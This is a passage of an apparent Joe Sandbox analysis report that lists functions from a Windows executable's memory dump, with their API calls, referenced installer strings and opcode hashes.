                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 855768636-0
                                                                                                      • Opcode ID: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
                                                                                                      • Instruction ID: f7bad605b8f68185b4e834990bb8ca2287257270a928060092b59a923d315d7c
                                                                                                      • Opcode Fuzzy Hash: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
                                                                                                      • Instruction Fuzzy Hash: E5114A71B0030067E650BA7B8C86B5B76C9AB88748F15083FB545EB387DE7DDD094299
                                                                                                      APIs
                                                                                                      • OffsetRect.USER32(?,?,00000000), ref: 00495988
                                                                                                      • OffsetRect.USER32(?,00000000,?), ref: 004959A3
                                                                                                      • OffsetRect.USER32(?,?,00000000), ref: 004959BD
                                                                                                      • OffsetRect.USER32(?,00000000,?), ref: 004959D8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: OffsetRect
                                                                                                      • String ID:
                                                                                                      • API String ID: 177026234-0
                                                                                                      • Opcode ID: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
                                                                                                      • Instruction ID: 9409249b62c1188f54b5b62e2685c04785358b71117f53a2337039625fc08c68
                                                                                                      • Opcode Fuzzy Hash: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
                                                                                                      • Instruction Fuzzy Hash: 1121AEB6700701AFDB00DE69CD81E5BB7DAEFC4350F248A2AF944C3249D638ED048761
                                                                                                      APIs
                                                                                                      • GetCursorPos.USER32 ref: 00417260
                                                                                                      • SetCursor.USER32(00000000), ref: 004172A3
                                                                                                      • GetLastActivePopup.USER32(?), ref: 004172CD
                                                                                                      • GetForegroundWindow.USER32(?), ref: 004172D4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1959210111-0
                                                                                                      • Opcode ID: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
                                                                                                      • Instruction ID: de3f0dc6b436800086b9427ec8ddd2ec86eeedce3a35093462374e80c8eda50e
                                                                                                      • Opcode Fuzzy Hash: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
                                                                                                      • Instruction Fuzzy Hash: C52183313086118AD720AFA9E945AE733F1EF44754B0544ABF8558B352DB3DDC82CB9E
                                                                                                      APIs
                                                                                                      • MulDiv.KERNEL32(?,00000008,?), ref: 004955F1
                                                                                                      • MulDiv.KERNEL32(?,00000008,?), ref: 00495605
                                                                                                      • MulDiv.KERNEL32(?,00000008,?), ref: 00495619
                                                                                                      • MulDiv.KERNEL32(?,00000008,?), ref: 00495637
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                                      • Instruction ID: b77f8f3c6746ea581d036ce488ab013aedd37a602364075716cddbfd1b85439e
                                                                                                      • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                                      • Instruction Fuzzy Hash: A5112E72604504ABCB40DEA9D8C4D9B7BECEF8D324B6441AAF908DB242D674ED408B68
                                                                                                      APIs
                                                                                                      • GetClassInfoA.USER32(00400000,0041F470,?), ref: 0041F4A1
                                                                                                      • UnregisterClassA.USER32(0041F470,00400000), ref: 0041F4CA
                                                                                                      • RegisterClassA.USER32(00499598), ref: 0041F4D4
                                                                                                      • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F50F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 4025006896-0
                                                                                                      • Opcode ID: 2789f09181fedf2aa8f29be774d1bfe7920984f559ea6f8e8637ed1726722249
                                                                                                      • Instruction ID: 7a0dc659497f48f9aad4428a0df7724adcaf244520b53866b591a9b3b5545ee4
                                                                                                      • Opcode Fuzzy Hash: 2789f09181fedf2aa8f29be774d1bfe7920984f559ea6f8e8637ed1726722249
                                                                                                      • Instruction Fuzzy Hash: F6011B72240104AADA10EBACED81E9B33999729314B11423BB615E72A2D6399C558BAC
                                                                                                      APIs
                                                                                                      • WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                                                      • CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 4071923889-0
                                                                                                      • Opcode ID: 8aa0dd6ec5a68f6f7641eb82506f7728cd0b20fc7582fe19e2ee2bc87ac6724f
                                                                                                      • Instruction ID: ea90b2abd28d60bbe0c33bbe6d7a83e36ef454db8471bda6b5c19e9a906557d9
                                                                                                      • Opcode Fuzzy Hash: 8aa0dd6ec5a68f6f7641eb82506f7728cd0b20fc7582fe19e2ee2bc87ac6724f
                                                                                                      • Instruction Fuzzy Hash: B9012D31A006097FEB1097AA8C02F6FBBECDF49764F610127F904D72C2C5788D409A78
                                                                                                      APIs
                                                                                                      • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D027
                                                                                                      • LoadResource.KERNEL32(00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58,0000000A,00000000), ref: 0040D041
                                                                                                      • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58), ref: 0040D05B
                                                                                                      • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?), ref: 0040D065
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                      • String ID:
                                                                                                      • API String ID: 3473537107-0
                                                                                                      • Opcode ID: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                                                      • Instruction ID: ce77ce8360aa458f47a01e9b0563465317cd85cc21d7bcd45488e041df035c61
                                                                                                      • Opcode Fuzzy Hash: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                                                      • Instruction Fuzzy Hash: 49F04F726056046F9B14EE59A881D5B77ECDE88268310013AF908E7286DA38DD018B68
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 004705F1
                                                                                                      Strings
                                                                                                      • Unsetting NTFS compression on file: %s, xrefs: 004705D7
                                                                                                      • Setting NTFS compression on file: %s, xrefs: 004705BF
                                                                                                      • Failed to set NTFS compression state (%d)., xrefs: 00470602
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast
                                                                                                      • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                                                      • API String ID: 1452528299-3038984924
                                                                                                      • Opcode ID: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                                      • Instruction ID: 452327faed6fd823952186a677ff1a78a18aba12ee86070aec797b5412e08bdc
                                                                                                      • Opcode Fuzzy Hash: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                                      • Instruction Fuzzy Hash: A5018B71D09248A6CB04D7AD94512DDBBE49F4D314F44C5FFE459D7342DB780A088B9E
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(00000000,00000000), ref: 0046FE45
                                                                                                      Strings
                                                                                                      • Setting NTFS compression on directory: %s, xrefs: 0046FE13
                                                                                                      • Failed to set NTFS compression state (%d)., xrefs: 0046FE56
                                                                                                      • Unsetting NTFS compression on directory: %s, xrefs: 0046FE2B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast
                                                                                                      • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                                                      • API String ID: 1452528299-1392080489
                                                                                                      • Opcode ID: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                                      • Instruction ID: 6c3eba688a3488f6cff2036d9eec8e6f632fba0cce39d579df3f4bd3b957a0ce
                                                                                                      • Opcode Fuzzy Hash: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                                      • Instruction Fuzzy Hash: E5014421E0824856CB04D7ADE44129DBBA49F49304F4485BBA495E7253EB790A09879B
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                      • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000,0045B7D5), ref: 00455DD8
                                                                                                      • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000), ref: 00455DE1
                                                                                                      • RemoveFontResourceA.GDI32(00000000), ref: 00455DEE
                                                                                                      • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455E02
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 4283692357-0
                                                                                                      • Opcode ID: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
                                                                                                      • Instruction ID: 71ccc6c4ad223293e5fa71c014565a1ca4f3f808124b73c5b0663eb55104ffd2
                                                                                                      • Opcode Fuzzy Hash: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
                                                                                                      • Instruction Fuzzy Hash: 57F0BEB174070036EA10B6BAAC4BF2B26CC8F54745F10883ABA00EF2C3D97CDC04962D
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$CountSleepTick
                                                                                                      • String ID:
                                                                                                      • API String ID: 2227064392-0
                                                                                                      • Opcode ID: dfa0650b41a5fbb69b4da717be5ba207ba5450cdb50d9376c11a56b5a3797e8a
                                                                                                      • Instruction ID: 56d8cd0ebf6ab4a4d31aad6ab38b951dee0ff9c0bbbb70c30f4e079d31b44593
                                                                                                      • Opcode Fuzzy Hash: dfa0650b41a5fbb69b4da717be5ba207ba5450cdb50d9376c11a56b5a3797e8a
                                                                                                      • Instruction Fuzzy Hash: C6E0ED6A30921149863131AE98CA6AF4D48CBC2324B28853FE08CE6283C89C4C0A867E
                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB,00000000), ref: 0047820D
                                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB), ref: 00478213
                                                                                                      • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478235
                                                                                                      • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478246
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                      • String ID:
                                                                                                      • API String ID: 215268677-0
                                                                                                      • Opcode ID: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                                                                      • Instruction ID: 91f0679cb69370e855683a510bc75a037ced8834772831ea40795c83ba0b1c60
                                                                                                      • Opcode Fuzzy Hash: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                                                                      • Instruction Fuzzy Hash: D8F037716447007BD600E6B58C81E5B73DCEB44354F04493E7E98C71C1DA78DC089776
                                                                                                      APIs
                                                                                                      • GetLastActivePopup.USER32(?), ref: 0042424C
                                                                                                      • IsWindowVisible.USER32(?), ref: 0042425D
                                                                                                      • IsWindowEnabled.USER32(?), ref: 00424267
                                                                                                      • SetForegroundWindow.USER32(?), ref: 00424271
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                                      • String ID:
                                                                                                      • API String ID: 2280970139-0
                                                                                                      • Opcode ID: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                                                                      • Instruction ID: 2c5ff33fc315f6eb6fab431e1453bcb0e66c5aaaa6596e28cc8dc28fd0b03a53
                                                                                                      • Opcode Fuzzy Hash: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                                                                      • Instruction Fuzzy Hash: C7E0EC61B02672D6AE31FA7B2881A9F518C9D45BE434641EBBC04FB38ADB2CDC1141BD
                                                                                                      APIs
                                                                                                      • GlobalHandle.KERNEL32 ref: 0040626F
                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00406276
                                                                                                      • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040627B
                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00406281
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$AllocHandleLockUnlock
                                                                                                      • String ID:
                                                                                                      • API String ID: 2167344118-0
                                                                                                      • Opcode ID: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                                      • Instruction ID: 5df08fd8dc2b017785a639aa93036e57be915985ffe03f20f856cac12e18577c
                                                                                                      • Opcode Fuzzy Hash: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                                      • Instruction Fuzzy Hash: 0BB009C4810A01BEEC0473B24C0BE3F245CD88172C3904A6F3448BA183987C9C405A3A
                                                                                                      APIs
                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047BB01,?,00000000,00000000,00000001,00000000,0047A4B5,?,00000000), ref: 0047A479
                                                                                                      Strings
                                                                                                      • Failed to parse "reg" constant, xrefs: 0047A480
                                                                                                      • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047A2ED
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Close
                                                                                                      • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                                      • API String ID: 3535843008-1938159461
                                                                                                      • Opcode ID: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                                                                      • Instruction ID: 25f2a786541cb687838a6194ffc4a73185deb9e5551b5ad8c851c0bf1152322b
                                                                                                      • Opcode Fuzzy Hash: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                                                                      • Instruction Fuzzy Hash: 22817274E00108AFCB10DF95D485ADEBBF9AF88344F50817AE814B7392D739AE05CB99
                                                                                                      APIs
                                                                                                      • GetForegroundWindow.USER32(00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835C5
                                                                                                      • SetActiveWindow.USER32(?,00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835D7
                                                                                                      Strings
                                                                                                      • Will not restart Windows automatically., xrefs: 004836F6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ActiveForeground
                                                                                                      • String ID: Will not restart Windows automatically.
                                                                                                      • API String ID: 307657957-4169339592
                                                                                                      • Opcode ID: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
